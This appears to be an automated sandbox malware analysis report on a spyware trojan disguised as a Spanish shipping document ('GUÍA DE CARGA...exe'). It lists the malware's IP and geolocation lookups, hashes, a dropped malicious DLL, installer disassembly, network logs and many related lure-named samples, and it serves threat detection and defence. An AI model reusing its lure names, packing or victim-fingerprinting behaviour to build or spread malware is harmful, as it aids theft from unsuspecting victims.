                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGU#U00cdA DE CARGA...exe, 00000002.00000002.524448122.0000000002291000.00000004.00000001.sdmpfalse
                      		high
                      http://freegeoip.appGU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://freegeoip.app/xml/185.189.150.72xGU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://checkip.dyndns.orgD8GU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      216.146.43.70
                      		checkip.dyndns.comUnited States
                      		33517DYNDNSUSfalse
                      104.21.19.200
                      		freegeoip.appUnited States
                      		13335CLOUDFLARENETUSfalse

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:491666
                      Start date:27.09.2021
                      Start time:19:42:44
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 37s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:GU#U00cdA DE CARGA...exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@3/2@3/2
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 27.9% (good quality ratio 17.8%)
                      • Quality average: 52.1%
                      • Quality standard deviation: 43.6%
                      HCA Information:
                      • Successful, ratio: 81%
                      • Number of executed functions: 114
                      • Number of non-executed functions: 54
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 23.54.113.53, 95.100.54.203, 20.50.102.62, 23.0.174.200, 23.0.174.185, 40.112.88.60, 20.82.210.154, 23.10.249.43, 23.10.249.26
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      216.146.43.70RFQ-847393.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      Draft_scanned_copy.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      temp order.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      PI.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      PO.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      ECueDLG20M.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      AVB CMAU6526450 40HC COI2100105.docGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      ABONOF2201.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      SWIFT_COPY USD 13420.60.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      SHIPPING DOC (CI,COO,PL,BL).exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      PO09858.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      Po#6672.pdf.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      swift.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      7BBm3Ns3nA.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      RFQ-847393.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      RFQ.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      MONRAC E FATURA 15.09.2021.pdf.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      doc03589220210903102454.pdf.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      dFFHjYOuICF2IOc.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      PO.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      checkip.dyndns.comTT09876545678T8R456.exeGet hashmaliciousBrowse
                      • 132.226.247.73
                      01_extracted.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      SOA.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      S.O.A.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                      • 132.226.247.73
                      #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      DHL NOTIFICATIONS.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      DHL NOTIFICATION.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      2acrvok36Y.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      Pendants.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      09876567824567890987654.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      DHL Awb_ Docs 5544834610_pdf.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      NS. ORDINE N. 141.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      cash payment.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      TT09876545678T8R456.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      Swift_6408372.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      RFQ-847393.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      KLC45E_92421_PI.exeGet hashmaliciousBrowse
                      • 132.226.247.73
                      Yeni sipari#U015f _WJO-001, pdf.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      freegeoip.appTT09876545678T8R456.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      01_extracted.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      SOA.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      S.O.A.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      DHL NOTIFICATIONS.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      DHL NOTIFICATION.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      2acrvok36Y.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      Exodus.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      Pendants.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      09876567824567890987654.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      DHL Awb_ Docs 5544834610_pdf.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      NS. ORDINE N. 141.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      cash payment.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      TT09876545678T8R456.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      Swift_6408372.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      RFQ-847393.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      KLC45E_92421_PI.exeGet hashmaliciousBrowse
                      • 104.21.19.200

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      DYNDNSUSDHL NOTIFICATION.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      09876567824567890987654.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      RFQ-847393.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      TinphatPO0090221_Xlsx.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      ORD4367 _WJO-001, pdf.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      TT3456522345.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      Draft_scanned_copy.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      temp order.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      PI.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      PO.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      ECueDLG20M.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      AVB CMAU6526450 40HC COI2100105.docGet hashmaliciousBrowse
                      • 216.146.43.70
                      PO 4500151298.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      ABONOF2201.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      hSqkX3ZIw4.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      MIKPRON GROUP - MATERIAL-REQUIREMENTS.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      SWIFT_COPY USD 13420.60.exeGet hashmaliciousBrowse
                      • 216.146.43.70
                      pF4vlHFijX.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      22234678762234500009000.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      AD4y5D8a4c.exeGet hashmaliciousBrowse
                      • 216.146.43.71
                      CLOUDFLARENETUSTT09876545678T8R456.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      Original Shipping documents.exeGet hashmaliciousBrowse
                      • 162.159.129.233
                      Image-Scan-80195056703950029289.exeGet hashmaliciousBrowse
                      • 162.159.133.233
                      RHgAncmh0E.exeGet hashmaliciousBrowse
                      • 162.159.135.233
                      InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                      • 162.159.129.233
                      InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                      • 162.159.130.233
                      01_extracted.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      InvPixcareer.-5589234_20210927.xlsbGet hashmaliciousBrowse
                      • 162.159.135.233
                      INQUIRY LIST.exeGet hashmaliciousBrowse
                      • 162.159.133.233
                      qJvDfzBXbsGet hashmaliciousBrowse
                      • 104.16.180.49
                      YTHK21082400.exeGet hashmaliciousBrowse
                      • 162.159.133.233
                      Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                      • 162.159.129.233
                      Sht1aYGDIXGet hashmaliciousBrowse
                      • 1.3.103.27
                      26222021 114007 a.m. Owa Outlook App.htmlGet hashmaliciousBrowse
                      • 104.16.19.94
                      Taskmgr.exeGet hashmaliciousBrowse
                      • 162.159.134.233
                      SOA.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      SWIFT ADVISE VD20092021.Pdf.exeGet hashmaliciousBrowse
                      • 162.159.129.233
                      xccHIJ0vo7.exeGet hashmaliciousBrowse
                      • 162.159.133.233
                      S.O.A.exeGet hashmaliciousBrowse
                      • 172.67.188.154
                      9Fq3K0VfLK.exeGet hashmaliciousBrowse
                      • 162.159.134.233

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      54328bd36c14bd82ddaa0c04b25ed9adq2D8haqKv5.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      TT09876545678T8R456.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      Original Shipping documents.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      TAX INVOICE_CCU-30408495_00942998_20180910_194738.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      RHgAncmh0E.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      01_extracted.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      INQUIRY LIST.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      YTHK21082400.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      Taskmgr.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      SOA.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      SWIFT ADVISE VD20092021.Pdf.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      xccHIJ0vo7.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      S.O.A.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      9Fq3K0VfLK.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      DHL NOTIFICATIONS.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      DHL NOTIFICATION.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                      • 104.21.19.200
                      P.O-20210927041575.exeGet hashmaliciousBrowse
                      • 104.21.19.200

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\150qx0uurbj07478t
                      Process:C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe
                      File Type:data
                      Category:dropped
                      Size (bytes):286207
                      Entropy (8bit):7.97789916669033
                      Encrypted:false
                      SSDEEP:6144:guGADqFm61UqReSJr/m81S3kqvtxmZr7pEyAqR7WJuVcQTJYiL2A01:HGADqVLReSJcMr7nAE7WJeJY+2b1
                      MD5:58E960ADA46422911469C6736EC07378
                      SHA1:8E6E429BA453A550DEEAC0143F5A89B0BE16A90E
                      SHA-256:4A32B80C0753D81B6675D53341FD77D1622C9AE376F2D6654FD2A20FB8E5749E
                      SHA-512:54337928AAA67D141916602756C25698174E72E9156BAF742A91E28FA7AFF2E01BD9FC67B920FACE07DDC0889BD12B0E33A79D632BB456700DEC27469CF474DC
                      Malicious:false
                      Reputation:low
                      Preview: 4...rZ....*7..7...Y^.s .......5m.....5.O.OV..Y.g..$Sk.?.H.k.......3@..+.j....<.w...^.........\6m.S..4..B.T7.....=.^....:...Q..E.G.L~...*Oi.Z..tr..P..T82u...zb...=8;........9.9....>G/...5F*..E..i....F=c........@...S$.>68...g......17...M.$y!_/.L.KZ...y*7.S..w...s ........TjQ....5.O..V..Y.3..$S..?..k.....=V.@.35.]j#...un[5j..v....H... t%...q..L.AV^....W.1.;zj.^.Y..:...+p;c.|OY........K.W.x.#M.VBK..........,L9..X..%.s..~.U.P..{.q&...b4.C.?..M.~.._'...2.C.....qV..x..pE.....4..C...M.$y!_>..dZ...j*7..7..Y^. .......5m...z.5....A.Y...$S..?...k.....aV.@a35.]a#@........v...!H.>.. .%._R...L.AV9....6.<.;.i...3&.:....+:~c...Yh.>...>.*.l.x.#M.VBG.s$v.....D...9Fl....hs..~.U.P..{.q....b4.C.?..1.~x._'...2.C..X...'..x..pE.....4..C...M.$y!_/.L.KZ....*7..7..Y^.s .......5m.....5.O.OV..Y.g..$Sk.?.H.k.....aV.@a35.]a#...u.[.j..v...!H._.. t%._.q..L.AV9....6.1.;zj.^....:...+p;c.$.Yh.....>.*.l.x.#M.VBK..........,L9Fq...%.s..~.U.P..{.q&...b4.C.?..1.~x._'...2.C..X...'..
                      C:\Users\user\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll
                      Process:C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):6.207441110517842
                      Encrypted:false
                      SSDEEP:768:yiljJiW4mQHeRfNzHMUNAf7momUEKRnJyQuJYDc2y2NnAHKlv/JWQvI2jIRo1imj:ljJiW4qzSzxvlv/JWQVZHVuIXxCReqdC
                      MD5:1982C77D094D91EA36D299F4E8879B9E
                      SHA1:4FAF7DD4BF9F8BEC2C0F421980B8FB2AB628835D
                      SHA-256:7660CDD2DB7356C36ACB9D2472AC2C89EBDFD79EEF56DE9DBFED34FCDE381790
                      SHA-512:75CA8A3BA5DD36C30805C13F5739F9E868D48AAA84D20A1E3B58923580726E40A3E4B850C66646CA1EE9AE46AE7A8ACCFF089D5BADE2677D7E8B4438087ED3BA
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 9%
                      Reputation:low
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.3...`...`...`.o.a...`.o.a...`...`...`vS.a...`vS.a...`sS6`...`vS.a...`Rich...`........PE..L.....Qa...........!.....j...R............................................................@.........................0...H...t........................................................................................................................text....h.......j.................. ..`.bss.....................................rdata..,............n..............@..@.data...:6.......8...~..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.911140442126515
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:GU#U00cdA DE CARGA...exe
                      File size:325929
                      MD5:fcce8f5a7e5fcdf78c02d6543c1af2bd
                      SHA1:b2ea7197933811fc65425d46324af8ee231117f3
                      SHA256:9ff6781bac4d77465a973def710d9619cfa7fc6fe16a78225b7e22d3a89d0be0
                      SHA512:dbdb5ca75513d15f94a14ca771fbb55e3d4ba204b3d9ce243327b439e28ffd01c4a7f7ee7dda34c43ac1c3f51c5abd420ccb54af1e80d32e5c7cbe899b787537
                      SSDEEP:6144:F8LxBs9fvNLROF9fYjzpeoG7DDCImlUR7WJDVcQTJ8iL2A03cu:/p1LQUj9eL7SIm87WJHJ8+2b3cu
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                      File Icon

                      Icon Hash:b2a88c96b2ca6a72

                      Static PE Info

                      General

                      Entrypoint:0x40312a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:b76363e9cb88bf9390860da8e50999d2

                      Entrypoint Preview

                      Instruction
                      sub esp, 00000184h
                      push ebx
                      push ebp
                      push esi
                      push edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [esp+20h], ebx
                      mov dword ptr [esp+14h], 00409168h
                      mov dword ptr [esp+1Ch], ebx
                      mov byte ptr [esp+18h], 00000020h
                      call dword ptr [004070B0h]
                      call dword ptr [004070ACh]
                      cmp ax, 00000006h
                      je 00007FB3FCD28603h
                      push ebx
                      call 00007FB3FCD2B3E4h
                      cmp eax, ebx
                      je 00007FB3FCD285F9h
                      push 00000C00h
                      call eax
                      mov esi, 00407280h
                      push esi
                      call 00007FB3FCD2B360h
                      push esi
                      call dword ptr [00407108h]
                      lea esi, dword ptr [esi+eax+01h]
                      cmp byte ptr [esi], bl
                      jne 00007FB3FCD285DDh
                      push 0000000Dh
                      call 00007FB3FCD2B3B8h
                      push 0000000Bh
                      call 00007FB3FCD2B3B1h
                      mov dword ptr [0042EC24h], eax
                      call dword ptr [00407038h]
                      push ebx
                      call dword ptr [0040726Ch]
                      mov dword ptr [0042ECD8h], eax
                      push ebx
                      lea eax, dword ptr [esp+38h]
                      push 00000160h
                      push eax
                      push ebx
                      push 00429058h
                      call dword ptr [0040715Ch]
                      push 0040915Ch
                      push 0042E420h
                      call 00007FB3FCD2AFE4h
                      call dword ptr [0040710Ch]
                      mov ebp, 00434000h
                      push eax
                      push ebp
                      call 00007FB3FCD2AFD2h
                      push ebx
                      call dword ptr [00407144h]

                      Rich Headers

                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x9e0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x5e660x6000False0.670572916667data6.44065573436IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0x70000x12a20x1400False0.4455078125data5.0583287871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x90000x25d180x600False0.458984375data4.18773476617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x370000x9e00xa00False0.45390625data4.4968702957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x371900x2e8dataEnglishUnited States
                      RT_DIALOG0x374780x100dataEnglishUnited States
                      RT_DIALOG0x375780x11cdataEnglishUnited States
                      RT_DIALOG0x376980x60dataEnglishUnited States
                      RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                      RT_MANIFEST0x377100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                      Imports

                      DLLImport
                      KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                      USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                      ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 27, 2021 19:43:58.692723989 CEST4973980192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:58.731369019 CEST8049739216.146.43.70192.168.2.5
                      Sep 27, 2021 19:43:58.735291004 CEST4973980192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:58.736373901 CEST4973980192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:58.775042057 CEST8049739216.146.43.70192.168.2.5
                      Sep 27, 2021 19:43:58.775068998 CEST8049739216.146.43.70192.168.2.5
                      Sep 27, 2021 19:43:58.775084972 CEST8049739216.146.43.70192.168.2.5
                      Sep 27, 2021 19:43:58.775247097 CEST4973980192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:58.777354002 CEST4973980192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:58.818202019 CEST8049739216.146.43.70192.168.2.5
                      Sep 27, 2021 19:43:58.939796925 CEST4974080192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:58.980545044 CEST8049740216.146.43.70192.168.2.5
                      Sep 27, 2021 19:43:58.980680943 CEST4974080192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:58.981575012 CEST4974080192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:59.019995928 CEST8049740216.146.43.70192.168.2.5
                      Sep 27, 2021 19:43:59.020028114 CEST8049740216.146.43.70192.168.2.5
                      Sep 27, 2021 19:43:59.020040989 CEST8049740216.146.43.70192.168.2.5
                      Sep 27, 2021 19:43:59.020114899 CEST4974080192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:59.020462990 CEST4974080192.168.2.5216.146.43.70
                      Sep 27, 2021 19:43:59.058743954 CEST8049740216.146.43.70192.168.2.5
                      Sep 27, 2021 19:44:00.376888037 CEST49741443192.168.2.5104.21.19.200
                      Sep 27, 2021 19:44:00.376948118 CEST44349741104.21.19.200192.168.2.5
                      Sep 27, 2021 19:44:00.378215075 CEST49741443192.168.2.5104.21.19.200
